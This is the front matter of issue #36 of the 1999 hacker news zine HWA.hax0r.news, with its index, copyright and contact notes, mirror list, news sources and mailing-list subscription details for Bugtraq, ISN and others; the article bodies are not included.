[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 36 Volume 1 1999 Oct 3rd 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "ABUSUS NON TOLLIT USUM" ========================================================================== Today the spotlight may be on you, some interesting machines that have accessed these archives recently... marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de "your enemy is never a villain in his own eyes, keep this in mind, it may offer a way to make him your friend if not you can kill him without hate, and quickly." - Unknown (From the Sam Spade port scanner tips dialog for windows 9x) http://www.blighty.com/products/spade/ http://welcome.to/HWA.hax0r.news/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Web site sponsored by CUBESOFT networks http://www.csoft.net check them out for great fast web hosting! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= The Hacker's Ethic Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= A Comment on FORMATTING: I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= New mirror sites http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #36 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #36 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ `ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. The Real ReDATtAck poised to Attack Belgium?..................... 04.0 .. FAQ and Guide to Cracking by Mixter.............................. 05.0 .. DOD Launches Computer Crime Lab ................................. 06.0 .. IBM to Launch Security Chip ..................................... 07.0 .. Law Firm Sued Over Possible Cyber Attack ........................ 08.0 .. Danish Man Sentenced for Intrusion Attempt ...................... 09.0 .. DOE to Spend $80mil on Info Security ............................ 10.0 .. The Army Wants to Eliminate Passwords ........................... 11.0 .. MediaPlayer and RealPlayer send GUID's to internet sites......... 12.0 .. GTE accidentally sends unlisted numbers to telemarketers ........ 13.0 .. ``Relationship Marketing?'' We have to talk...................... 14.0 .. News and views from SLa5H........................................ 15.0 .. Forbidden Knowledge #7 is being released......................... 16.0 .. The 'real' story behind JP and PSS as per Forbes magazine........ 17.0 .. ActiveX Buffer Overruns Advisory................................. 18.0 .. CyberArmy: Wingates list......................................... 19.0 .. Internet Vigilantism A story so fantastic it just might be true.. 20.0 .. Forbes calls AntiOnline's bluff.................................. 21.0 .. BO2K, good or evil? The Debate Continues. ....................... 22.0 .. 97bit ECC Stronger than 512bit RSA .............................. 23.0 .. DOE Loses Dough to Budget Cut.................................... 24.0 .. California Proposes Email Eavesdropping Law ..................... 25.0 .. Singaporean Boy Sentenced to 12 Months .......................... 26.0 .. CIA Funds Startup VC Firm ....................................... 27.0 .. BO2K, NetBus, and now WinWhatWhere .............................. 28.0 .. Microsoft, Insecure or Just More Prevalent? ..................... 29.0 .. Darktide Hacking Is Closed ...................................... 30.0 .. NIPC Head Warns of Y2K Bug Fixes ................................ 31.0 .. Better Computer Security Needs More Than Just Laws .............. 32.0 .. New NT Security List Started .................................... 33.0 .. Computer Security Dictionary Released ........................... 34.0 .. CyberWarfare - Real or Imagined? ................................ 35.0 .. Theo de Raadt and OpenBSD Profiled .............................. 36.0 .. SPAM HOUSE....................................................... 37.0 .. NET-SECURITY SITE INFO........................................... 38.0 .. PCWEEKS' HACKER CHALLENGE "RIGGED" FOR NT........................ 39.0 .. DUTCH "CYBERCOPS" PATROLLING THE NET............................. 40.0 .. BIKE WEB SITE HACKS ITSELF....................................... 41.0 .. ARMY STUDYING IT RECRUITMENT..................................... 42.0 .. TRUSTE OK'S HOTMAIL FIXES........................................ 43.0 .. SECURE DSL TECHNOLOGY............................................ 44.0 .. HACK, COUNTERHACK................................................ 45.0 .. NO SAFETY IN NUMBERS............................................. 46.0 .. YAHOO! MESSENGER DoS............................................. 47.0 .. PROBLEM IN MCF40.DLL............................................. 48.0 .. US AIMS TO FIGHT ATTACKS ON FINANCIAL SYSTEMS.................... 49.0 .. DIGITALBOND ON SSL............................................... 50.0 .. THE FUTURE OF AV COMPANIES....................................... 51.0 .. UNPLUGGING THE "PHONEMASTERS".................................... 52.0 .. INDIA RESPONDS TO Y2K ACCUSATIONS................................ 53.0 .. ANOTHER IE 5.0 HOLE EXPOSED...................................... 54.0 .. TELECOM INDUSTRY DECRIES DIGITAL WIRETAP DEADLINE................ 55.0 .. FED COMPUTER SECURITY BILL HAS STRONG SUPPORT.................... 56.0 .. JUSTICE DEPT. TO FUND ANTIHACKING CAMPAIGN....................... 57.0 .. COURT TO REVISIT CRYPTO RULING................................... 58.0 .. DRAM ROBBERIES................................................... 59.0 .. DON'T BLAME BO FOR SECURITY PROBLEMS............................. 60.0 .. WHY HACKING CONTESTS ARE A BAD IDEA.............................. 61.0 .. NO $35 MILLION FOR DOE CYBER SECURITY............................ 62.0 .. DOD SELLS NON Y2K COMPLIANT EQUIPMENT WITHOUT WARNING............ 63.0 .. HATE ON GOVERNMENT WEB SITE...................................... 64.0 .. MS: JUST KEEP ON PATCHING........................................ =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.. ................. Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net Websites; sAs72.......................: http://members.tripod.com/~sAs72/ Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/ @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black eentity ...( '' '' ): Currently active/IRC+ man in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sla5h.............................: Croatia N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Wyze1.............................: South Africa Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign 